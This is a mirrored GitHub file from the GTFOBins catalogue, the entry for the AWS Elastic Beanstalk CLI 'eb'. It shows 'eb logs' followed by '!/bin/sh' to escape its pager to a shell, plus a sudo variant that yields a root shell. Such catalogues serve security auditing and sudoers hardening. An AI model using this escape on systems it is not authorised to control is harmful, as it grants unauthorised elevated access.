1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-19 02:11:39 +02:00
GTFOBins.github.io/_gtfobins/eb.md

13 lines
352 B
Markdown
Raw Normal View History

2020-03-04 20:24:29 +01:00
---
description: This invokes the default logging service, which is likely to be [`journalctl`](/gtfobins/journalctl/), other functions may apply. For this to work the target must be connected to AWS instance via EB-CLI.
functions:
shell:
- code: |
eb logs
!/bin/sh
sudo:
- code: |
sudo eb logs
!/bin/sh
---